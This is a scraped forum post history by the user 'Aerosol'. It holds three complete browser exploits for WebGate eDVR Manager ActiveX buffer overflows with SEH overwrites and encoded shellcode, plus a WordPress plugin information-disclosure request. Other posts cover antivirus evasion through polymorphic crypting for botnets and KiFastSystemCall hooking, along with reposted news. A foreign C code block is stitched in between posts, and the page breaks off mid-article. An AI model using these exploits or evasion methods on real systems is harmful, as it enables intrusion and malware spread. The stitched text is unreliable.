Aerosol

Everything posted by Aerosol

  1. Level 1 (Elite) » Level 2 (Anony) » Level 3 (Trans) » Socks4 » Socks5 ProxyFire
  2. Proxy Level 1 (Elite) IP Port Type Country Area City Last update(ago) Source
  3. <html>
     <!--
     # Exploit Title: WebGate eDVR Manager Connect Method Stack Buffer Overflow
     # Date: 01st April, 2015
     # Exploit Author: Praveen Darshanam
     # Vendor Homepage: http://www.webgateinc.com/wgi/eng/
     # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
     # Tested on: Windows XP SP3 using IE8
     # CVE : 2015-2097
     targetFile = "C:\WINDOWS\system32\WESPSDK\WESPSerialPort.dll"
     prototype = "Sub Connect ( ByVal IPAddr As String , ByVal PortNum As Integer , ByVal UserID As String , ByVal Password As String )"
     progid = "WESPSERIALPORTLib.WESPSerialPortCtrl"
     Tested on IE8
     Author: Praveen Darshanam
     http://blog.disects.com/
     http://darshanams.blogspot.com/
     P.S. Do not remove back slashes in shellcode and other variables
     -->
     <object classid='clsid:BAAA6516-267C-466D-93F5-C504EF973837' id='target'> </object>
     <script>
     var arg1="PraveenD";
     var arg2=1;
     var arg3= "";
     var arg4="PraveenD";
     var nops = "";
     var shellcode = "";
     var buff2 = "";
     for (i=0; i<1664; i++) { arg3 += "B"; }
     var nseh = "\xeb\x10PD";
     //WESPSerialPort.dll(0x100104e7 = pop pop ret)
     var seh = "\xe7\x04\x01\x10";
     for (i=0;i<80; i++) { nops += "\x90"; }
     shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
     "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
     "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
     "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
     "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
     "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
     "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
     "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
     "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
     "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
     "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
     "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
     "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
     "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
     "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
     "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
     "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
     "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
     "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
     "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
     "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
     "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
     "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
     "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
     "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
     "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
     "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
     "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
     "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
     "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
     "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
     "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
     "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
     "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
     "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
     for (i=0;i<(8000 - (arg3.length + nseh.length + seh.length + nops.length + shellcode.length)); i++) { buff2 += "A"; }
     fbuff = arg3 + nseh + seh + nops + shellcode + buff2;
     target.Connect(arg1, arg2, fbuff ,arg4);
     </script>
     </html>
     Source
  4. <html>
     <!--
     # Exploit Title: WebGate eDVR Manager SiteChannel Property Stack Buffer Overflow
     # Date: 01st April, 2015
     # Exploit Author: Praveen Darshanam
     # Vendor Homepage: http://www.webgateinc.com/wgi/eng/
     # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
     # Version: eDVR Manager 2.6.4
     # Tested on: Windows XP SP3 using IE6/7/8
     # CVE : 2015-2098
     targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
     prototype = "Property Let SiteChannel ( ByVal SiteSerialNumber As String , ByVal indx As Integer ) As Long"
     progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
     Tested on IE6/7/8
     Author: Praveen Darshanam
     http://darshanams.blogspot.com/
     http://blog.disects.com/
     P.S. Do not remove back slashes in shellcode and other variables
     -->
     <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'> </object>
     <script>
     var arg1 = "";
     var arg2 = 1;
     var arg3 = 1;
     var nops = "";
     var shellcode = "";
     var buff2 = "";
     for (i=0; i<128; i++) { arg1 += "B"; }
     var nseh = "\xeb\x10PD";
     var seh = "\xa0\xf2\x07\x10";
     for (i=0;i<80; i++) { nops += "\x90"; }
     shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
     "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
     "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
     "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
     "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
     "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
     "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
     "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
     "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
     "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
     "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
     "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
     "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
     "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
     "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
     "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
     "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
     "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
     "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
     "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
     "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
     "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
     "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
     "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
     "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
     "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
     "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
     "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
     "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
     "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
     "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
     "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
     "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
     "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
     "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
     for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++) { buff2 += "A"; }
     fbuff = arg1 + nseh + seh + nops + shellcode + buff2;
     target.SiteChannel(fbuff ,arg2 ) = arg3;
     </script>
     </html>
     Source
  5. <html>
     <!--
     # Exploit Title: WebGate eDVR Manager AudioOnlySiteChannel Property Stack Buffer Overflow
     # Date: 01st April, 2015
     # Exploit Author: Praveen Darshanam
     # Vendor Homepage: http://www.webgateinc.com/wgi/eng/
     # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
     # Version: eDVR Manager 2.6.4
     # Tested on: Windows XP SP3 using IE6/7/8
     # CVE : 2015-2098
     targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
     prototype = "Property Let AudioOnlySiteChannel ( ByVal SiteSerialNumber As String , ByVal Channel As Integer ) As Long"
     progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
     Tested on IE6/7/8
     Author: Praveen Darshanam
     http://darshanams.blogspot.com/
     http://blog.disects.com/
     P.S. Do not remove back slashes in shellcode and other variables
     -->
     <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'> </object>
     <script>
     var arg1 = "";
     var arg2 = 1;
     var arg3 = 1;
     var nops = "";
     var shellcode = "";
     var buff2 = "";
     for (i=0; i<128; i++) { arg1 += "B"; }
     var nseh = "\xeb\x10PD";
     var seh = "\xa0\xf2\x07\x10";
     for (i=0;i<80; i++) { nops += "\x90"; }
     shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
     "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
     "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
     "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
     "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
     "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
     "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
     "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
     "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
     "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
     "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
     "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
     "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
     "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
     "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
     "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
     "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
     "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
     "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
     "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
     "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
     "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
     "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
     "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
     "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
     "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
     "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
     "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
     "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
     "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
     "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
     "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
     "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
     "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
     "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
     for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++) { buff2 += "A"; }
     fbuff = arg1 + nseh + seh + nops + shellcode + buff2;
     target.AudioOnlySiteChannel(fbuff ,arg2 ) = arg3
     </script>
     </html>
     Source
  6. #Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure
     #Product: Wordpress plugin Simple Ads Manager
     #Vendor: https://profiles.wordpress.org/minimus/
     #Affected version: Simple Ads Manager 2.5.94 and 2.5.96
     #Download link: https://wordpress.org/plugins/simple-ads-manager/
     #CVE ID: CVE-2015-2826
     #Author: Nguyen Hung Tuan (tuan.h.nguyen@itas.vn) & ITAS Team

     ::PROOF OF CONCEPT::
     + REQUEST
     POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
     Host: target.com
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 17

     action=load_users

     + Function list: load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats,...
     + Vulnerable file: simple-ads-manager/sam-ajax-admin.php
     + Image: http://www.itas.vn/uploads/newsother/disclosure.png
     + REFERENCE:
     - http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en

     Best regards
     --------------------------------
     ITAS Team (www.itas.vn)
     Source
  7. Before we start it's probably best to explain some things:

     Signature - A pattern of bytes used by an antivirus to identify malicious executables; this could be a string, parts of a function, or a hash.
     Crypting - This is the most common way of evading antivirus detections; it works by encrypting the malicious executable so the antivirus cannot match the malicious code to existing signatures.
     Payload - The malicious executable which is encrypted to evade detections; this is attached to the stub in some way (stored as a resource, added after the end of file, appended to a new or existing section).
     Stub - A simple program responsible for decrypting the payload and executing it in memory. Due to the payload being encrypted, antiviruses will attempt to generate signatures to match the stub's code, but because the stub is small and simple it can be easily modified to evade existing signatures.

     Polymorphism

     Polymorphism is a solution to a problem mainly found with worms/botnets: when an AV adds a new signature that detects the malicious executable, the infected file will be quarantined, leaving the malware running in memory until reboot. If a botmaster is running a botnet with thousands of bots, each time the stub is detected he's likely to lose a few hundred bots; his only choice is to keep updating the bots with a new stub before the previous one is detected (which for large botnets can be every few hours), leaving the hacker with very little free time. A solution to this would be to write malware capable of programmatically generating a unique stub and replacing the old one on execution, resulting in each computer having a different stub; this is known as polymorphism. There are a few ways to programmatically create unique code that performs the same function as the previous.

     Block Mutation

     A lot of assembly instructions can be freely movable, whilst some cannot. An instruction using a relative address (such as a jump or call), when moved, will point to a different location, breaking the code; freely movable instructions such as those using absolute addresses or only registers can be moved anywhere. Block based polymorphism works by breaking the code down into small blocks, which are then numbered; the number specifies the order in which they execute and the block is either marked as movable or immovable based on its containing instruction. The mutation engine can then reorder, relocate, or separate the movable blocks, using jumps or similar instructions to link them together so that they execute in the correct order. Junk code (random instructions which are never actually executed) can also be added between blocks to add more entropy and change the executable size.

     Register Swapping

     It's possible to write the code in such a way that registers can easily be switched out; for instance, all occurrences of edx within a function could be replaced with ecx, changing a lot of bytes within the application. The only problem with this approach is there are only a few usable registers, making it easy to exhaust all possible combinations, and it's still possible to generate signatures based on the layout of the instructions.

     Internal Assembler + Intermediate Language

     A very effective approach is to embed an assembler within the payload, as well as create an intermediate language (IL) which the polymorphic engine uses to create ASM on the fly. A simple example would be the following IL code:

     pmov Reg1, 5
     add eax, Reg1

     In this example instructions prefixed with p will be mutated at an instruction level, whilst those without a prefix will just be assigned a register and compiled as ASM. The IL engine would then use a seed to randomly generate the p-prefixed instructions by picking an instruction, or group of instructions, to perform the operation, as well as assign a register to Reg1 and Reg2. The array of instructions to handle pmov would look something like this:

     push val
     pop reg

     mov reg, val

     xor reg, reg
     add reg, val

     Once the engine has picked which instruction it wishes to use, it would then fill in the register and value, then compile it to ASM. Here are some examples of final outputs:

     push 5
     pop edx
     add eax, edx

     mov ecx, 5
     add eax, ecx

     xor ebx, ebx
     add ebx, 5
     add eax, ebx

     By using an IL, we avoid having to first disassemble the stub code before mutating it.

     Metamorphism

     Today advanced metamorphic malware which can efficiently evade signature detection is nearly impossible, but back in the days of DOS / 95 / 98 viruses it was achieved multiple times. The idea of metamorphism is to take polymorphism a step further: instead of encrypting the malicious executable and mutating the stub, the entire malicious executable is mutated, including the code required to perform the mutation. Malware that is required to create a new, unique copy of itself on every propagation is also required to disassemble previously mutated code and regulate size (because instructions can be mutated into multiple instructions, it's important to be able to do the opposite, or the executable grows almost exponentially with every mutation). Due to the amount of consideration and effort that would have to go into creating modern metamorphic malware, most programmers opt to use polymorphism instead, as this allows them to generate output from a temporary representation. A simple mistake during disassembling could result in the executable ceasing to work, and it's a lot harder to debug and test metamorphism in large applications.
     Source
  8. Usually I don't post things like this, but because KiFastSystemCall hooking only works on x86 systems and doesn't work on Windows 8 or above, it no longer has much use in malware. There are also multiple public implementations for this method, just not very elegant, which I hope to correct. If you haven't read my previous article about this topic, or need a refresher, you can find it here.

     Performing a System Call

     KiFastSystemCall has a very strange calling convention (if you can call it that). Each native function (Ex: NtCreateFile) corresponds to a function with the same name in the SSDT. In order to make the transition from user mode to kernel mode, the instruction "sysenter" is used. I don't want to go into great detail on how the sysenter instruction actually enters kernel mode, as that would take up the entire page, but I'll explain the basics: the SSDT is an array of addresses for each native function. The number you see being moved into the eax register is known as its ordinal, and is the position within the SSDT where that function's address is located. When the sysenter instruction is executed the kernel reads the ordinal from eax and uses it to call the corresponding function in the SSDT, before returning execution to user mode. Something important to note is that the native function simply calls KiFastSystemCall and doesn't even set up a stack frame, meaning the address of the first parameter can only be accessed using [esp+8], so we can't just hook KiFastSystemCall with a C function, as this matches no standard calling convention (which is what makes the method so tricky to implement).

     Dispatching Calls

     Since the last article I've improved on the dispatching method, which now has two purposes:
     - Determining which native function made the call to KiFastSystemCall, so we can properly handle it.
     - Setting up the stack in such a way that we can access the parameters using plain C.

     Dispatching

     Normally we'd hook each individual function we want to intercept with a single handler (proxy), but all native functions call KiFastSystemCall, so we need to think differently. As I explained earlier, the SSDT is an array of addresses and the ordinal (which is in eax when KiFastSystemCall is invoked) corresponds to the position of that function's address within the SSDT. Using this knowledge we can do the same: we create an array of addresses for the proxy functions and use the ordinal in eax to locate the correct handler. For our SSDT each entry will be 8 bytes, so the handler needs to be placed at our_ssdt[2*ordinal] (in order to get the ordinal for a native function we just read 4 bytes starting at the 2nd byte of the function). You're probably wondering why each entry for our SSDT is 8 bytes, instead of 4; this is because in order to set up the stack before calling the proxy, we need to know how many parameters were passed to KiFastSystemCall (we store the proxy address as the first 4 bytes and the number of parameters as the rest).

     Preparing the Stack

     When KiFastSystemCall is invoked, there are two return addresses between the stack pointer and the function parameters (the return from KiFastSystemCall to the native function and the return from the native function). In order to call the proxy function we will get the number of parameters for the function from our_ssdt[2*ordinal+4] and push them to the stack again, in stdcall format (the proxy function is responsible for removing them from the stack). The last thing that is pushed to the stack before we call the proxy is the eax register (the ordinal); we will need this later if we wish to call the original, non-hooked, version of KiFastSystemCall.

     The Code

     FstHook - This is my own C library which allows a program to easily hook any number of native functions using a single hook on KiFastSystemCall.
     https://github.com/MalwareTech/FstHook/
     Source
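An added illustration (my own code, not FstHook's) of the two facts the post above relies on: the SSDT ordinal is the 4 bytes following the native stub's first byte, and the dispatch table needs the proxy address plus the parameter count. It parses a constructed XP-era 32-bit ntdll stub (mov eax, N / mov edx, 7FFE0300h / call [edx] / ret N, a layout assumed here), refuses a stub whose first instruction has been overwritten (the integrity check an AV or EDR runs to spot a hooked native function), and recovers the parameter count from the stdcall ret immediate, which the post does not spell out; the sample ordinal and byte values are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Assumed layout of a 32-bit ntdll native stub (Windows XP era):
 *   B8 imm32        mov eax, <SSDT ordinal>   (the 4 bytes starting at byte 1)
 *   BA 00 03 FE 7F  mov edx, 7FFE0300h        (SharedUserData pointer to KiFastSystemCall)
 *   FF 12           call dword ptr [edx]
 *   C2 imm16        ret <bytes to pop>        (stdcall: parameter count = imm16 / 4)
 */
#define STUB_LEN 15

typedef struct {
    uint32_t ordinal;   /* index into the SSDT */
    uint32_t nparams;   /* stack slots the dispatcher must re-push before calling the proxy */
} stub_info_t;

/* Returns 1 and fills *out if the bytes match the expected layout, 0 otherwise.
 * A stub that no longer begins with B8 (e.g. E9 = jmp rel32) has been patched,
 * which is the classic sign of an inline hook on the native function. */
int parse_native_stub(const uint8_t *stub, size_t len, stub_info_t *out)
{
    static const uint8_t mov_edx_call[] = { 0xBA, 0x00, 0x03, 0xFE, 0x7F, 0xFF, 0x12 };
    size_t i;
    if (len < STUB_LEN || stub[0] != 0xB8 || stub[12] != 0xC2)
        return 0;
    for (i = 0; i < sizeof mov_edx_call; i++)
        if (stub[5 + i] != mov_edx_call[i])
            return 0;
    {
        uint32_t ordinal = (uint32_t)stub[1] | ((uint32_t)stub[2] << 8) |
                           ((uint32_t)stub[3] << 16) | ((uint32_t)stub[4] << 24);
        uint32_t cleanup = (uint32_t)stub[13] | ((uint32_t)stub[14] << 8);
        if (cleanup % 4 != 0)           /* stdcall cleanup is always whole 4-byte slots */
            return 0;
        out->ordinal = ordinal;
        out->nparams = cleanup / 4;
    }
    return 1;
}

/* Mirror of the post's "our SSDT": one entry per ordinal holding the proxy address
 * and the parameter count (the two 4-byte halves of its 8-byte entry on x86). */
#define MAX_ORDINAL 1024
typedef void (*proxy_fn)(void);
typedef struct {
    proxy_fn handler;
    uint32_t nparams;
} dispatch_entry_t;

typedef struct {
    dispatch_entry_t entries[MAX_ORDINAL];
} dispatch_table_t;

/* Registers a proxy for the native function whose stub bytes are given.
 * Returns the ordinal used as the table index, or -1 if the stub does not parse. */
int install_proxy(dispatch_table_t *t, const uint8_t *stub, size_t len, proxy_fn handler)
{
    stub_info_t info;
    if (!parse_native_stub(stub, len, &info) || info.ordinal >= MAX_ORDINAL)
        return -1;
    t->entries[info.ordinal].handler = handler;
    t->entries[info.ordinal].nparams = info.nparams;
    return (int)info.ordinal;
}

/* What the dispatcher does with eax: index the table by ordinal and report
 * how many parameters must be re-pushed before the proxy is called. */
proxy_fn find_proxy(const dispatch_table_t *t, uint32_t ordinal, uint32_t *nparams)
{
    if (ordinal >= MAX_ORDINAL || t->entries[ordinal].handler == NULL)
        return NULL;
    *nparams = t->entries[ordinal].nparams;
    return t->entries[ordinal].handler;
}

/* Constructed sample: ordinal 0x25 with 44 bytes of stack cleanup (11 parameters). */
const uint8_t SAMPLE_STUB[STUB_LEN] = {
    0xB8, 0x25, 0x00, 0x00, 0x00,
    0xBA, 0x00, 0x03, 0xFE, 0x7F,
    0xFF, 0x12,
    0xC2, 0x2C, 0x00
};
/* Constructed sample of the same stub after an inline hook replaced its start with jmp rel32. */
const uint8_t HOOKED_STUB[STUB_LEN] = {
    0xE9, 0x00, 0x10, 0x00, 0x00,
    0xBA, 0x00, 0x03, 0xFE, 0x7F,
    0xFF, 0x12,
    0xC2, 0x2C, 0x00
};

static void sample_handler(void) { }

int main(void)
{
    static dispatch_table_t table;   /* zero-initialised: no proxies installed yet */
    stub_info_t info;
    uint32_t n = 0;
    int ord = install_proxy(&table, SAMPLE_STUB, STUB_LEN, sample_handler);
    printf("installed proxy at ordinal %d\n", ord);
    if (find_proxy(&table, (uint32_t)ord, &n))
        printf("dispatcher would re-push %u parameters\n", n);
    printf("patched stub accepted: %d\n", parse_native_stub(HOOKED_STUB, STUB_LEN, &info));
    return 0;
}
```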
  9. Towards making Bittorrent anonymous and impossible to shut down. We use our own dedicated Tor-like network for anonymous torrent downloading. We implemented and enhanced the Tor protocol specifications plus merged them with Bittorrent streaming. More info: https://github.com/Tribler/tribler/wiki

     Tribler includes our own Tor-like onion routing network with hidden services based seeding and end-to-end encryption, detailed specs: https://github.com/Tribler/tribler/wiki/Anonymous-Downloading-and-Streaming-specifications

     The aim of Tribler is giving anonymous access to online (streaming) videos. We are trying to make privacy, strong cryptography and authentication the Internet norm. Tribler currently offers a Youtube-style service. For instance, Bittorrent-compatible streaming, fast search, thumbnail previews and comments. For the past 9 years we have been building a very robust Peer-to-Peer system. Today Tribler is robust: "the only way to take Tribler down is to take The Internet down" (but a single software bug could end everything).

     We make use of submodules, so remember to use the --recursive argument when cloning this repo.
     https://github.com/Tribler/tribler
     Site: Tribler - Privacy using our Tor-inspired onion routing
  10. Four U.S. citizens have been indicted by a federal grand jury in Pittsburgh for their alleged roles in an international Federal Reserve Notes (FRN) counterfeiting operation based out of Uganda, according to a Thursday release from the Department of Justice.

     Ryan Gustafson – who is currently incarcerated and facing charges in Uganda – is charged alongside Zackary Ruiz, Jeremy Miller, and Michael Lin with conspiracy and counterfeiting acts committed in and out of the U.S.

     Gustafson allegedly set up Community-X in December 2013, a website on the dark web that was “dedicated to the manufacturing, selling, buying, distribution and passing of counterfeit [FRNs], which [Gustafson] claimed to have manufactured,” the release stated, citing the indictment. The Community-X website evolved in September 2014 after Gustafson allegedly split it into two separate sites – one a Community-X HQ with controlled access, and another a Community-X Recruitment Center that was publicly accessible. Gustafson, Ruiz and Miller were allegedly active members of both sites, while Lin was only a member of the Recruitment Center, the Justice Department noted in the release.

     “Gustafson and others allegedly sold these [ugandan-made] counterfeit FRNs to purchasers in the U.S.,” the release said. “From December 2013 through February 2014, an associate of Gustafson sent DHL packages containing these counterfeit FRNs to individuals in the U.S. After February 2014, Gustafson had the counterfeit FRNs smuggled into the U.S. by hiding the counterfeit FRNs in glued together pages of fake charity pamphlets.”

     Ruiz, Miller and Lin allegedly had different roles in the operation, the Justice Department release indicated. Ruiz allegedly unpacked the counterfeit FRNs and – along with Miller – treated, prepared and mailed the counterfeit FRNs via the U.S. Postal Service to re-shippers and purchasers. Lin was allegedly a purchaser, and also helped in passing the phony notes in casinos.

     “The indictment alleges more than $1.4 million in counterfeit FRNs have been seized and passed worldwide, both overseas and in the U.S. as part of this scheme,” the release said.

     The maximum prison sentence for a conspiracy count is five years, the maximum prison sentence for a conspiracy to commit money laundering count is 20 years, and the maximum prison sentence for each passing and receiving counterfeit money count is also 20 years, the Justice Department noted.
     Source
  11. Firefox-maker Mozilla has joined Google in refusing to recognize SSL certificates issued by the China Internet Network Information Centre (CNNIC). This comes after a security biz in Egypt used a CNNIC-issued intermediate certificate to create unauthorized SSL certs that could be used to trick people into connecting to bogus, password-stealing Gmail.com or Google.com websites. Google, and now Moz, are outraged by CNNIC's sloppiness in the case. CNNIC is run by the Middle Kingdom's government, and handles the .cn domain name registry, IP address allocation and other things as well as issuing SSL certificates for encrypted websites via intermediaries. "After reviewing the circumstances and a robust discussion on our public mailing list, we have concluded that CNNIC's behaviour in issuing an unconstrained intermediate certificate to a company with no documented PKI practices and with no oversight of how the private key was stored or controlled was an 'egregious practice' as per Mozilla's CA Certificate Enforcement Policy," the Mozilla security team wrote in a Thursday 